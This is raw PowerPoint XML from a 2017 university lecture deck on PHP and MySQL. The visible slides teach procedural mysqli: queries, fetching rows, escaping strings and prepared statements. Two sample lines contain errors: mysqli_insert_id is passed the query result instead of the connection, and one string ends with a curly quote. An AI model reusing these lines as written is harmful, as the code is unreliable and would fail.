            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245669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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Procedurally</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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To check that the connection has been made and handle it, you could use code such as this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_connect_errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) die(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And to make a MySQL query, you would use code such as the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($link, "SELECT * FROM classics");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon return, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will contain the data. You can find out the number of rows returned as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$rows = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3484766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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Procedurally</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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can fetch the actual data one row at a time in the following way, which returns a numeric array:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result, MYSQLI_NUM);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$row[0] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will contain the first column of data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$row[1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the second, and so on. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you need to know the insert ID of an insert operation, you can always call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_insert_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>function, like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insertID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_insert_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escaping strings procedurally with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is as easy as using the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$escaped = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($link, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156238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0C64-3AD0-4D32-9EE2-5D79048ECF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="292555"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Procedurally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02844BAE-B60A-44DA-A067-917FCF5A5222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1683659"/>
            <a:ext cx="10515600" cy="5058229"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To prepare a statement with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is as simple as this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($link, 'INSERT INTO classics VALUES(?,?,?,?,?)’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To bind variables to the prepared statement, you would then use the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_stmt_bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sssss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>', $author, $title, $category, $year, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isbn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And to execute the prepared statement after assigning the variables with the required values, you would issue this call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_stmt_execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2385176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21332</TotalTime>
  <Words>3652</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>453</Paragraphs>
  <Slides>38</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Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Preventing HTML Injection</vt:lpstr>
      <vt:lpstr>Preventing HTML Injection</vt:lpstr>
      <vt:lpstr>Preventing HTML Injection</vt:lpstr>
      <vt:lpstr>Preventing HTML Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Using mysqli procedurally</vt:lpstr>
      <vt:lpstr>Using mysqli Procedurally</vt:lpstr>
      <vt:lpstr>Using mysqli Procedurally</vt:lpstr>
      <vt:lpstr>Using mysqli Procedurally</vt:lpstr>
      <vt:lpstr>Using mysqli Procedurally</vt:lpstr>
      <vt:lpstr>Form Handling</vt:lpstr>
      <vt:lpstr>Building Forms</vt:lpstr>
      <vt:lpstr>Building Forms</vt:lpstr>
      <vt:lpstr>Retrieving Submitted Data</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>register_globals</vt:lpstr>
      <vt:lpstr>register_globals</vt:lpstr>
      <vt:lpstr>Default Values</vt:lpstr>
      <vt:lpstr>Default Values</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Input Types</vt:lpstr>
      <vt:lpstr>Something more on sanitizing the inputs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Fabio Di Troia</dc:creator>
  <cp:lastModifiedBy>Fabio Di Troia</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-23T16:21:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-07T23:00:09Z</dcterms:modified>
</cp:coreProperties>
</file>